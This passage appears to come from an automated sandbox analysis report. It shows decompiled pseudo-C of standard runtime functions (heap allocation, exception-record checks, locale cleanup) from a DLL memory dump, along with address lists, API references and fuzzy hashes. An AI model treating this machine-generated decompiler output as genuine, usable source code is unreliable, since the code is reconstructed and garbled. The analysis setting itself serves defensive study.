													 *0x6d4ea26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6D4A5904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6D4A5920(_t63, _t90, _t93, 0x6d54506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6D4A3F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6D4A58E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6D4C2281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6d547b04, 0, _t95); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6D4DBEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6D4C9256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

0x6d4a3f60
0x6d4a3f66
0x6d4a3f67
0x6d4a3f6b
0x6d4a3f6c
0x6d4a3f73
0x6d4a3f76
0x6d4a3f7c
0x6d4a3f7d
0x6d4a3f7e
0x6d4a3f85
0x6d4a3f88
0x6d4a3f8b
0x6d4a3f93
0x6d4a3f98
0x6d4a3f9b
0x6d4a3f9e
0x6d4a3fa5
0x6d4a4006
0x6d4a4009
0x6d4a4011
0x6d4a4018
0x00000000
0x6d4a4018
0x00000000
0x6d4a3fa7
0x6d4a3fa7
0x6d4a3fad
0x6d4a3fb3
0x6d4a3fb9
0x6d4a4029
0x6d4a4032
0x6d4a3fbb
0x6d4a3fc0
0x6d4a3fc0
0x6d4a3fc3
0x6d4a3fc6
0x6d4a3fc9
0x6d4a3fcc
0x6d4a3fcf
0x6d4a3fd2
0x6d4a3fd7
0x6d4a3fed
0x00000000
0x6d4a3fd9
0x6d4a3fd9
0x6d4a3fdb
0x6d4a3fe0
0x6d4a3fe2
0x6d4a3fe5
0x6d4a3fe7
0x6d4a3ffd
0x6d4a401d
0x6d4a401d
0x6d4a401e
0x6d4a4021
0x00000000
0x6d4a3fe9
0x6d4a3fe9
0x6d4a4033
0x6d4a4036
0x6d4a403c
0x6d4a403e
0x6d4a4045
0x6d4a404c
0x6d4a4051
0x6d4a4054
0x6d4a4056
0x6d4a4058
0x6d4a4065
0x6d4a406b
0x6d4a406d
0x6d4a4070
0x6d4a4070
0x6d4a4073
0x6d4a4073
0x6d4a4045
0x6d4a4079
0x6d4a407b
0x6d4a4080
0x6d4a4083
0x6d4a4086
0x6d4a408e
0x6d4a4092
0x6d4a4097
0x6d4a4097
0x6d4a409a
0x6d4a409b
0x6d4a409e
0x6d4a40a1
0x6d4a40ac
0x6d4a40ae
0x6d4a40b1
0x6d4a40b6
0x6d4a40ba
0x6d4c23d7
0x6d4cf26f
0x6d4cf272
0x6d4cf273
0x6d4cf276
0x6d4cf279
0x6d4cf2ab
0x6d4cf2b0
0x6d4cf2b6
0x6d4cf2b6
0x6d4cf27b
0x6d4cf27b
0x6d4cf27d
0x6d4cf27f
0x6d4cf27f
0x6d4cf296
0x6d4cf29f
0x6d4cf2a5
0x6d4cf2a7
0x00000000
0x00000000
0x6d4cf287
0x6d4cf289
0x00000000
0x6d4cf28b
0x6d4cf28c
0x6d4cf291
0x6d4cf292
0x6d4cf294
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4cf294
0x00000000
0x6d4cf289
0x6d4cf2a9
0x6d4cf2b8
0x6d4cf2ba
0x6d4a3feb
0x00000000
0x6d4a3feb
0x6d4a3fe9
0x6d4a3fe7
0x00000000
0x6d4a3ff0
0x6d4a3ff0
0x6d4a3ff2
0x6d4a3ff9
0x00000000
0x6d4a3ffb
0x00000000
0x6d4a3ff9
0x6d4a3fb9
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6D4A3F8B
___except_validate_context_record.LIBVCRUNTIME ref: 6D4A3F93
_ValidateLocalCookies.LIBCMT ref: 6D4A4021
__IsNonwritableInCurrentImage.LIBCMT ref: 6D4A404C
_ValidateLocalCookies.LIBCMT ref: 6D4A40A1

Strings

csm, xrefs: 6D4A4036

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 6752ca5eb7207eb4a0be1fe4760b1b0c56764b7baad36cba04619b00eab6e929
Instruction ID: bf2816685033dac0a05439758d341c5dbd6b8bba4f4824cfb0b0bb2120d69599
Opcode Fuzzy Hash: 6752ca5eb7207eb4a0be1fe4760b1b0c56764b7baad36cba04619b00eab6e929
Instruction Fuzzy Hash: F541E734A04219ABCF00DF68C884EAEBBB5BF55368F188159E91C5B359DB31DD05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD29B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4DD29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6D4DCF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6D4DCF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6D4DCF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6D4DCF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6D4DCF81(_t5, 2);
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6D4DCF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6D4DCF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6D4DCF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6D4DCF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6D4DCF81(_t13, 2);
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6D4CCBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6d4dd2a1
0x6d4dd2a6
0x6d4dd2af
0x6d4dd2b4
0x6d4dd2ba
0x6d4dd2bf
0x6d4dd2c5
0x6d4dd2ca
0x6d4dd2d0
0x6d4dd2d5
0x6d4dd2de
0x6d4dd2e9
0x6d4dd2f4
0x6d4dd2ff
0x6d4dd304
0x6d4dd30d
0x6d4dd312
0x6d4dd31b
0x6d4dd323
0x6d4dd32c
0x6d4dd331
0x6d4dd33a
0x6d4dd33f
0x6d4dd348
0x6d4dd353
0x6d4dd35e
0x6d4dd369
0x00000000
0x6d4dd379
0x6d4dd37e

APIs

Part of subcall function 6D4DCF81: _free.LIBCMT ref: 6D4DCFAA

_free.LIBCMT ref: 6D4DD2E9

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

_free.LIBCMT ref: 6D4DD2F4
_free.LIBCMT ref: 6D4DD2FF
_free.LIBCMT ref: 6D4DD353
_free.LIBCMT ref: 6D4DD35E
_free.LIBCMT ref: 6D4DD369
_free.LIBCMT ref: 6D4DD374

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction ID: 61234fe2ed452a17edb790d2b307c8d9e16fb6aaa0761a9f86b1ac6f06adaa05
Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction Fuzzy Hash: 7111B6B1A48B04BAD660E7B0DC15FCBB7AD9F08704F418D1DB39966091EB35BD1447D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48EF91, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48EF91(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;

				_t879 = __edx;
				_t668 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t946 - 0x14, 0);
				_t903 =  *0x6d546de4; // 0x0
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6D46161C(0x6d546d90);
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6D4866BA(_t946 - 0x14);
					return E6D4A0075(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6D490D03(__ebx, _t671, __edx, _t881, _t903) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t946 - 0x20);
							E6D4A3D74(_t946 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t881, _t903, 0x14);
							E6D486653(_t946 - 0x14, 0);
							_t904 =  *0x6d546db4; // 0x0
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6D46161C(0x6d546d68);
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6D4866BA(_t946 - 0x14);
								return E6D4A0075(_t882);
							} else {
								__eflags = _t904;
								if(_t904 == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6D490DA5(_t668, _t678, __edx, _t882, _t904) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t946 - 0x20);
										E6D4A3D74(_t946 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t668, _t882, _t904, 0x14);
										E6D486653(_t946 - 0x14, 0);
										_t905 =  *0x6d546dd4; // 0x0
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6D46161C(0x6d546b28);
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6D4866BA(_t946 - 0x14);
											return E6D4A0075(_t883);
										} else {
											__eflags = _t905;
											if(_t905 == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6D490E47(_t668, _t685, __edx, _t883, _t905) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t946 - 0x20);
													E6D4A3D74(_t946 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t668, _t883, _t905, 0x14);
													E6D486653(_t946 - 0x14, 0);
													_t906 =  *0x6d546de8; // 0x0
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6D46161C(0x6d546d94);
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6D4866BA(_t946 - 0x14);
														return E6D4A0075(_t884);
													} else {
														__eflags = _t906;
														if(_t906 == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6D490EB7(_t668, _t692, _t879, _t884, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t946 - 0x20);
																E6D4A3D74(_t946 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t668, _t884, _t906, 0x14);
																E6D486653(_t946 - 0x14, 0);
																_t907 =  *0x6d546db8; // 0x0
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6D46161C(0x6d546d6c);
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6D4866BA(_t946 - 0x14);
																	return E6D4A0075(_t885);
																} else {
																	__eflags = _t907;
																	if(_t907 == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6D490F1F(_t668, _t699, _t879, _t885, _t907) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t946 - 0x20);
																			E6D4A3D74(_t946 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t668, _t885, _t907, 0x14);
																			E6D486653(_t946 - 0x14, 0);
																			_t908 =  *0x6d546dec; // 0x0
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6D46161C(0x6d546d98);
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6D4866BA(_t946 - 0x14);
																				return E6D4A0075(_t886);
																			} else {
																				__eflags = _t908;
																				if(_t908 == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6D490F87(_t668, _t706, _t879, _t886, _t908) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t946 - 0x20);
																						E6D4A3D74(_t946 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t668, _t886, _t908, 0x14);
																						E6D486653(_t946 - 0x14, 0);
																						_t909 =  *0x6d546dbc; // 0x0
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6D46161C(0x6d546d70);
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6D4866BA(_t946 - 0x14);
																							return E6D4A0075(_t887);
																						} else {
																							__eflags = _t909;
																							if(_t909 == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6D490FEF(_t668, _t713, _t879, _t887, _t909) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t946 - 0x20);
																									E6D4A3D74(_t946 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t668, _t887, _t909, 0x14);
																									E6D486653(_t946 - 0x14, 0);
																									_t910 =  *0x6d546df0; // 0x0
																									 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																									 *(_t946 - 0x10) = _t910;
																									_t398 = E6D46161C(0x6d546d9c);
																									_t720 =  *((intOrPtr*)(_t946 + 8));
																									_t888 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t398);
																									__eflags = _t888;
																									if(_t888 != 0) {
																										L54:
																										E6D4866BA(_t946 - 0x14);
																										return E6D4A0075(_t888);
																									} else {
																										__eflags = _t910;
																										if(_t910 == 0) {
																											_push( *((intOrPtr*)(_t946 + 8)));
																											_push(_t946 - 0x10);
																											__eflags = E6D491057(_t668, _t720, _t879, _t888, _t910) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t946 - 0x20);
																												E6D4A3D74(_t946 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t668, _t888, _t910, 0x14);
																												E6D486653(_t946 - 0x14, 0);
																												_t911 =  *0x6d546dc0; // 0x0
																												 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																												 *(_t946 - 0x10) = _t911;
																												_t411 = E6D46161C(0x6d546d74);
																												_t727 =  *((intOrPtr*)(_t946 + 8));
																												_t889 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t411);
																												__eflags = _t889;
																												if(_t889 != 0) {
																													L61:
																													E6D4866BA(_t946 - 0x14);
																													return E6D4A0075(_t889);
																												} else {
																													__eflags = _t911;
																													if(_t911 == 0) {
																														_push( *((intOrPtr*)(_t946 + 8)));
																														_push(_t946 - 0x10);
																														__eflags = E6D4910BF(_t668, _t727, _t879, _t889, _t911) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t946 - 0x20);
																															E6D4A3D74(_t946 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t668, _t889, _t911, 0x14);
																															E6D486653(_t946 - 0x14, 0);
																															_t912 =  *0x6d546df8; // 0x0
																															 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																															 *(_t946 - 0x10) = _t912;
																															_t424 = E6D46161C(0x6d546da4);
																															_t734 =  *((intOrPtr*)(_t946 + 8));
																															_t890 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t424);
																															__eflags = _t890;
																															if(_t890 != 0) {
																																L68:
																																E6D4866BA(_t946 - 0x14);
																																return E6D4A0075(_t890);
																															} else {
																																__eflags = _t912;
																																if(_t912 == 0) {
																																	_push( *((intOrPtr*)(_t946 + 8)));
																																	_push(_t946 - 0x10);
																																	__eflags = E6D491127(_t668, _t734, _t879, _t890, _t912) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t946 - 0x20);
																																		E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t668, _t890, _t912, 0x14);
																																		E6D486653(_t946 - 0x14, 0);
																																		_t913 =  *0x6d546df4; // 0x0
																																		 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																		 *(_t946 - 0x10) = _t913;
																																		_t437 = E6D46161C(0x6d546da0);
																																		_t741 =  *((intOrPtr*)(_t946 + 8));
																																		_t891 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t437);
																																		__eflags = _t891;
																																		if(_t891 != 0) {
																																			L75:
																																			E6D4866BA(_t946 - 0x14);
																																			return E6D4A0075(_t891);
																																		} else {
																																			__eflags = _t913;
																																			if(_t913 == 0) {
																																				_push( *((intOrPtr*)(_t946 + 8)));
																																				_push(_t946 - 0x10);
																																				__eflags = E6D4911AB(_t668, _t741, _t879, _t891, _t913) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t946 - 0x20);
																																					E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t668, _t891, _t913, 0x14);
																																					E6D486653(_t946 - 0x14, 0);
																																					_t914 =  *0x6d546dc8; // 0x0
																																					 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																					 *(_t946 - 0x10) = _t914;
																																					_t450 = E6D46161C(0x6d546d7c);
																																					_t748 =  *((intOrPtr*)(_t946 + 8));
																																					_t892 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t450);
																																					__eflags = _t892;
																																					if(_t892 != 0) {
																																						L82:
																																						E6D4866BA(_t946 - 0x14);
																																						return E6D4A0075(_t892);
																																					} else {
																																						__eflags = _t914;
																																						if(_t914 == 0) {
																																							_push( *((intOrPtr*)(_t946 + 8)));
																																							_push(_t946 - 0x10);
																																							__eflags = E6D491230(_t668, _t748, _t879, _t892, _t914) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t946 - 0x20);
																																								E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t668, _t892, _t914, 0x14);
																																								E6D486653(_t946 - 0x14, 0);
																																								_t915 =  *0x6d546dc4; // 0x0
																																								 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																								 *(_t946 - 0x10) = _t915;
																																								_t463 = E6D46161C(0x6d546d78);
																																								_t755 =  *((intOrPtr*)(_t946 + 8));
																																								_t893 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t463);
																																								__eflags = _t893;
																																								if(_t893 != 0) {
																																									L89:
																																									E6D4866BA(_t946 - 0x14);
																																									return E6D4A0075(_t893);
																																								} else {
																																									__eflags = _t915;
																																									if(_t915 == 0) {
																																										_push( *((intOrPtr*)(_t946 + 8)));
																																										_push(_t946 - 0x10);
																																										__eflags = E6D4912B4(_t668, _t755, _t879, _t893, _t915) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t946 - 0x20);
																																											E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t668, _t893, _t915, 0x14);
																																											E6D486653(_t946 - 0x14, 0);
																																											_t916 =  *0x6d546dd8; // 0x0
																																											 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																											 *(_t946 - 0x10) = _t916;
																																											_t476 = E6D46161C(0x6d546d84);
																																											_t762 =  *((intOrPtr*)(_t946 + 8));
																																											_t894 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t476);
																																											__eflags = _t894;
																																											if(_t894 != 0) {
																																												L96:
																																												E6D4866BA(_t946 - 0x14);
																																												return E6D4A0075(_t894);
																																											} else {
																																												__eflags = _t916;
																																												if(_t916 == 0) {
																																													_push( *((intOrPtr*)(_t946 + 8)));
																																													_push(_t946 - 0x10);
																																													__eflags = E6D491339(_t668, _t762, _t879, _t894, _t916) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t946 - 0x20);
																																														E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t668, _t894, _t916, 0x14);
																																														E6D486653(_t946 - 0x14, 0);
																																														_t917 =  *0x6d546db0; // 0x0
																																														 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																														 *(_t946 - 0x10) = _t917;
																																														_t489 = E6D46161C(0x6d546d64);
																																														_t769 =  *((intOrPtr*)(_t946 + 8));
																																														_t895 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t489);
																																														__eflags = _t895;
																																														if(_t895 != 0) {
																																															L103:
																																															E6D4866BA(_t946 - 0x14);
																																															return E6D4A0075(_t895);
																																														} else {
																																															__eflags = _t917;
																																															if(_t917 == 0) {
																																																_push( *((intOrPtr*)(_t946 + 8)));
																																																_push(_t946 - 0x10);
																																																__eflags = E6D4913A1(_t668, _t769, _t879, _t895, _t917) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D461438(_t946 - 0x20);
																																																	E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e83cf, _t668, _t895, _t917, 0x14);
																																																	E6D486653(_t946 - 0x14, 0);
																																																	_t918 =  *0x6d546ddc; // 0x0
																																																	 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																	 *(_t946 - 0x10) = _t918;
																																																	_t502 = E6D46161C(0x6d546d88);
																																																	_t776 =  *((intOrPtr*)(_t946 + 8));
																																																	_t896 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t502);
																																																	__eflags = _t896;
																																																	if(_t896 != 0) {
																																																		L110:
																																																		E6D4866BA(_t946 - 0x14);
																																																		return E6D4A0075(_t896);
																																																	} else {
																																																		__eflags = _t918;
																																																		if(_t918 == 0) {
																																																			_push( *((intOrPtr*)(_t946 + 8)));
																																																			_push(_t946 - 0x10);
																																																			__eflags = E6D491409(_t668, _t776, _t879, _t896, _t918) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D461438(_t946 - 0x20);
																																																				E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																				asm("int3");
																																																				E6D4A00AC(0x6d4e83cf, _t668, _t896, _t918, 0x14);
																																																				E6D486653(_t946 - 0x14, 0);
																																																				_t919 =  *0x6d546de0; // 0x0
																																																				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																				 *(_t946 - 0x10) = _t919;
																																																				_t515 = E6D46161C(0x6d546d8c);
																																																				_t783 =  *((intOrPtr*)(_t946 + 8));
																																																				_t897 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t515);
																																																				__eflags = _t897;
																																																				if(_t897 != 0) {
																																																					L117:
																																																					E6D4866BA(_t946 - 0x14);
																																																					return E6D4A0075(_t897);
																																																				} else {
																																																					__eflags = _t919;
																																																					if(_t919 == 0) {
																																																						_push( *((intOrPtr*)(_t946 + 8)));
																																																						_push(_t946 - 0x10);
																																																						__eflags = E6D491471(_t668, _t783, _t879, _t897, _t919) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6D461438(_t946 - 0x20);
																																																							E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																							asm("int3");
																																																							E6D4A00AC(0x6d4e83cf, _t668, _t897, _t919, 0x14);
																																																							E6D486653(_t946 - 0x14, 0);
																																																							_t920 =  *0x6d546dfc; // 0x0
																																																							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																							 *(_t946 - 0x10) = _t920;
																																																							_t528 = E6D46161C(0x6d546da8);
																																																							_t790 =  *((intOrPtr*)(_t946 + 8));
																																																							_t898 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t528);
																																																							__eflags = _t898;
																																																							if(_t898 != 0) {
																																																								L124:
																																																								E6D4866BA(_t946 - 0x14);
																																																								return E6D4A0075(_t898);
																																																							} else {
																																																								__eflags = _t920;
																																																								if(_t920 == 0) {
																																																									_push( *((intOrPtr*)(_t946 + 8)));
																																																									_push(_t946 - 0x10);
																																																									__eflags = E6D4914EC(_t668, _t790, _t879, _t898, _t920) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6D461438(_t946 - 0x20);
																																																										E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																										asm("int3");
																																																										E6D4A00AC(0x6d4e83cf, _t668, _t898, _t920, 0x14);
																																																										E6D486653(_t946 - 0x14, 0);
																																																										_t921 =  *0x6d546dcc; // 0x0
																																																										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																										 *(_t946 - 0x10) = _t921;
																																																										_t541 = E6D46161C(0x6d546d80);
